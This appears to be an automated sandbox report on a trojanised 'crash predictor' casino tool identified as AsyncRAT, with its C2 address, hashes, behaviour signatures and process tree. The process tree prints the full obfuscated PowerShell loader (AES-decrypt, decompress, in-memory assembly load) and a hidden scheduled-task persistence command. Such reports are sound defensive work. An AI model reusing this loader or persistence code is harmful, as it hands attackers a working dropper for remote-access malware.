Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    177s
  • max time network
    189s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/10/2023, 06:45

General

  • Target

    500CASINO Crash Predictor/500CASINO Crash Predictor.exe

  • Size

    217KB

  • MD5

    41ea1432ba11237dbb1f7bc7465a3f92

  • SHA1

    7beb7a67e009f8256ad4b059f4257c605f8bc5e6

  • SHA256

    b979a84bfe350f25b7e9f18d9b66c1adf0c14225e10face5650e4df7621e2d31

  • SHA512

    f577261c37d1d3eb34f80179591db9b61f7ed45a83ed7b458be6f79785e61218d3713d4efa0d32a1aba0a88b46c0af144a117e68f973d7c5931b303d15da0900

  • SSDEEP

    1536:9Fe8KXo3TECoH1lYOdKtwVcl8mJmtupKQ:9wajECoH1lbKtqYFJmq

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

500CASINO

C2

windowsignn.theworkpc.com:6606

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\500CASINO Crash Predictor\500CASINO Crash Predictor.exe
    "C:\Users\Admin\AppData\Local\Temp\500CASINO Crash Predictor\500CASINO Crash Predictor.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4672
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\strapdll.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Users\Admin\AppData\Local\Temp\strapdll.bat.exe
        "strapdll.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_A_KiSeL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\strapdll.bat').Split([Environment]::NewLine);foreach ($_A_SwDpy in $_A_KiSeL) { if ($_A_SwDpy.StartsWith(':: @')) { $_A_TiqjO = $_A_SwDpy.Substring(4); break; }; };$_A_TiqjO = [System.Text.RegularExpressions.Regex]::Replace($_A_TiqjO, '_A_', '');$_A_PRYJB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_A_TiqjO);$_A_bhvRG = New-Object System.Security.Cryptography.AesManaged;$_A_bhvRG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_A_bhvRG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_A_bhvRG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+a/dhz+aqFTpcHIXfIP74OmC0Z5i4eBrJxD8N3dZ2ag=');$_A_bhvRG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('809QS9K1qh9CCpSDIFeQVA==');$_A_rVmnC = $_A_bhvRG.CreateDecryptor();$_A_PRYJB = $_A_rVmnC.TransformFinalBlock($_A_PRYJB, 0, $_A_PRYJB.Length);$_A_rVmnC.Dispose();$_A_bhvRG.Dispose();$_A_Gyrrz = New-Object System.IO.MemoryStream(, $_A_PRYJB);$_A_JOTrY = New-Object System.IO.MemoryStream;$_A_vxRkT = New-Object System.IO.Compression.GZipStream($_A_Gyrrz, [IO.Compression.CompressionMode]::Decompress);$_A_vxRkT.CopyTo($_A_JOTrY);$_A_vxRkT.Dispose();$_A_Gyrrz.Dispose();$_A_JOTrY.Dispose();$_A_PRYJB = $_A_JOTrY.ToArray();$_A_suVmE = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_A_PRYJB);$_A_pntSZ = $_A_suVmE.EntryPoint;$_A_pntSZ.Invoke($null, (, [string[]] ('')))
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\strapdll')
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4936
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_243_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_243.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1600
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_243.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4052
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_243.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4308
            • C:\Users\Admin\AppData\Roaming\startup_str_243.bat.exe
              "startup_str_243.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_A_KiSeL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_243.bat').Split([Environment]::NewLine);foreach ($_A_SwDpy in $_A_KiSeL) { if ($_A_SwDpy.StartsWith(':: @')) { $_A_TiqjO = $_A_SwDpy.Substring(4); break; }; };$_A_TiqjO = [System.Text.RegularExpressions.Regex]::Replace($_A_TiqjO, '_A_', '');$_A_PRYJB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_A_TiqjO);$_A_bhvRG = New-Object System.Security.Cryptography.AesManaged;$_A_bhvRG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_A_bhvRG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_A_bhvRG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+a/dhz+aqFTpcHIXfIP74OmC0Z5i4eBrJxD8N3dZ2ag=');$_A_bhvRG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('809QS9K1qh9CCpSDIFeQVA==');$_A_rVmnC = $_A_bhvRG.CreateDecryptor();$_A_PRYJB = $_A_rVmnC.TransformFinalBlock($_A_PRYJB, 0, $_A_PRYJB.Length);$_A_rVmnC.Dispose();$_A_bhvRG.Dispose();$_A_Gyrrz = New-Object System.IO.MemoryStream(, $_A_PRYJB);$_A_JOTrY = New-Object System.IO.MemoryStream;$_A_vxRkT = New-Object System.IO.Compression.GZipStream($_A_Gyrrz, [IO.Compression.CompressionMode]::Decompress);$_A_vxRkT.CopyTo($_A_JOTrY);$_A_vxRkT.Dispose();$_A_Gyrrz.Dispose();$_A_JOTrY.Dispose();$_A_PRYJB = $_A_JOTrY.ToArray();$_A_suVmE = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_A_PRYJB);$_A_pntSZ = $_A_suVmE.EntryPoint;$_A_pntSZ.Invoke($null, (, [string[]] ('')))
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:228
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_243')
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1400
    • C:\Users\Admin\AppData\Local\Temp\500CASINO Crash Predictor\dotnet\Startup.exe
      "dotnet/Startup.exe"
      2⤵
        PID:116

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      3f01549ee3e4c18244797530b588dad9

      SHA1

      3e87863fc06995fe4b741357c68931221d6cc0b9

      SHA256

      36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

      SHA512

      73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      f5f268a3d8760169bde3db6e00da5e6c

      SHA1

      00dc2443a967bf09147612f53ea5fc6a2cfb0b40

      SHA256

      b0f800d487f826601ef6a21ddd141c41d57182c1601e2adf1c0132b98c8d73b5

      SHA512

      c067de9cfefea861a08a29a1b10bcf93d360ec555bdd9fd24fb8f6ce6be432961a1acc4ccef786e953d86ef836db27fdef5fd5951930edd00e1c4fcfa3a9d67e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      b09e69e0bba8a3de744e887864787a5d

      SHA1

      f8e69700a220ad2899a589efa5bbe5fd003a7619

      SHA256

      4e46e9d73939a238385d0429fbc1fb00f1f0297f3ed4306ac8ca9ac9be40eab0

      SHA512

      0db0ba27863111ed0ffc78db6de736f8e88bd350d29082c3ce6d87185d24ae294676b1ac96b972467cbba962774184a7ff85382e4cb84d28ff87ba2017652e5e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      f5f268a3d8760169bde3db6e00da5e6c

      SHA1

      00dc2443a967bf09147612f53ea5fc6a2cfb0b40

      SHA256

      b0f800d487f826601ef6a21ddd141c41d57182c1601e2adf1c0132b98c8d73b5

      SHA512

      c067de9cfefea861a08a29a1b10bcf93d360ec555bdd9fd24fb8f6ce6be432961a1acc4ccef786e953d86ef836db27fdef5fd5951930edd00e1c4fcfa3a9d67e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2msbti0k.eom.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\strapdll.bat

      Filesize

      259KB

      MD5

      048d6b9d6ce5007914a2f05ee4c0325d

      SHA1

      9d6e22c1a0f867886bfc9b4491cc5a8cb2f8aba9

      SHA256

      3e3dd3b3b65df50fe8a27d6563dea3e2084d6f830186c3981b61367ebbc00ddd

      SHA512

      bf4f682b6eee7ee9e7994a633513ea6ae8c84a678649d0eceeccbaff5522fdeadb44fd371825b0bedf130e841ad2d27c7164c8a3511631211b420b2ea2b9a900

    • C:\Users\Admin\AppData\Local\Temp\strapdll.bat.exe

      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    • C:\Users\Admin\AppData\Local\Temp\strapdll.bat.exe

      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    • C:\Users\Admin\AppData\Roaming\startup_str_243.bat

      Filesize

      259KB

      MD5

      048d6b9d6ce5007914a2f05ee4c0325d

      SHA1

      9d6e22c1a0f867886bfc9b4491cc5a8cb2f8aba9

      SHA256

      3e3dd3b3b65df50fe8a27d6563dea3e2084d6f830186c3981b61367ebbc00ddd

      SHA512

      bf4f682b6eee7ee9e7994a633513ea6ae8c84a678649d0eceeccbaff5522fdeadb44fd371825b0bedf130e841ad2d27c7164c8a3511631211b420b2ea2b9a900

    • C:\Users\Admin\AppData\Roaming\startup_str_243.bat.exe

      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    • C:\Users\Admin\AppData\Roaming\startup_str_243.bat.exe

      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    • C:\Users\Admin\AppData\Roaming\startup_str_243.bat.exe

      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    • C:\Users\Admin\AppData\Roaming\startup_str_243.vbs

      Filesize

      115B

      MD5

      3a23287a53770a84db3e16f690c35510

      SHA1

      86dadaa34f83c2d897a273cac784252072877f41

      SHA256

      2d8561b47e816567ded12ccb24267f70d118053e14544660b8ba4e82e9ab4df0

      SHA512

      180e9e6571c0934996db48d9dc99a7bc20034134b0ec7b9912bdaee4cff4a0c8fb4d6da96dada2d1268306b57af79f3a0a6f53b5d33b47427581c15c87dc68e4

    • memory/116-69-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/116-25-0x000001C7E7E90000-0x000001C7E7EC8000-memory.dmp

      Filesize

      224KB

    • memory/116-27-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/228-111-0x00000292A35F0000-0x00000292A3600000-memory.dmp

      Filesize

      64KB

    • memory/228-126-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/228-110-0x00000292A35F0000-0x00000292A3600000-memory.dmp

      Filesize

      64KB

    • memory/228-131-0x00000292A35F0000-0x00000292A3600000-memory.dmp

      Filesize

      64KB

    • memory/228-127-0x00000292A35F0000-0x00000292A3600000-memory.dmp

      Filesize

      64KB

    • memory/228-134-0x00007FF8E4D70000-0x00007FF8E4D89000-memory.dmp

      Filesize

      100KB

    • memory/228-109-0x00000292A35F0000-0x00000292A3600000-memory.dmp

      Filesize

      64KB

    • memory/228-104-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/228-130-0x000002928AF20000-0x000002928AF36000-memory.dmp

      Filesize

      88KB

    • memory/228-135-0x00007FF8E4D70000-0x00007FF8E4D89000-memory.dmp

      Filesize

      100KB

    • memory/1400-113-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/1400-124-0x000001C16E970000-0x000001C16E980000-memory.dmp

      Filesize

      64KB

    • memory/1400-114-0x000001C16E970000-0x000001C16E980000-memory.dmp

      Filesize

      64KB

    • memory/1400-129-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/1600-76-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/1600-82-0x0000026122580000-0x0000026122590000-memory.dmp

      Filesize

      64KB

    • memory/1600-78-0x0000026122580000-0x0000026122590000-memory.dmp

      Filesize

      64KB

    • memory/1600-79-0x0000026122580000-0x0000026122590000-memory.dmp

      Filesize

      64KB

    • memory/1600-77-0x0000026122580000-0x0000026122590000-memory.dmp

      Filesize

      64KB

    • memory/1600-85-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/2552-0-0x00000173E0200000-0x00000173E0238000-memory.dmp

      Filesize

      224KB

    • memory/2552-11-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/2552-24-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/4008-83-0x000001431E110000-0x000001431E120000-memory.dmp

      Filesize

      64KB

    • memory/4008-81-0x000001431E110000-0x000001431E120000-memory.dmp

      Filesize

      64KB

    • memory/4008-43-0x000001431E110000-0x000001431E120000-memory.dmp

      Filesize

      64KB

    • memory/4008-74-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/4008-125-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/4008-80-0x000001431E110000-0x000001431E120000-memory.dmp

      Filesize

      64KB

    • memory/4008-41-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/4008-45-0x000001433A390000-0x000001433A5E0000-memory.dmp

      Filesize

      2.3MB

    • memory/4008-44-0x000001431E110000-0x000001431E120000-memory.dmp

      Filesize

      64KB

    • memory/4008-42-0x000001431E110000-0x000001431E120000-memory.dmp

      Filesize

      64KB

    • memory/4672-19-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/4672-16-0x00000264ECEA0000-0x00000264ECF16000-memory.dmp

      Filesize

      472KB

    • memory/4672-15-0x00000264ECA30000-0x00000264ECA74000-memory.dmp

      Filesize

      272KB

    • memory/4672-14-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/4672-13-0x00000264EA800000-0x00000264EA810000-memory.dmp

      Filesize

      64KB

    • memory/4672-12-0x00000264EA800000-0x00000264EA810000-memory.dmp

      Filesize

      64KB

    • memory/4672-10-0x00000264D21E0000-0x00000264D2202000-memory.dmp

      Filesize

      136KB

    • memory/4936-57-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB

    • memory/4936-58-0x000001992B4F0000-0x000001992B500000-memory.dmp

      Filesize

      64KB

    • memory/4936-59-0x000001992B4F0000-0x000001992B500000-memory.dmp

      Filesize

      64KB

    • memory/4936-60-0x000001992B4F0000-0x000001992B500000-memory.dmp

      Filesize

      64KB

    • memory/4936-62-0x00007FF8DA9C0000-0x00007FF8DB481000-memory.dmp

      Filesize

      10.8MB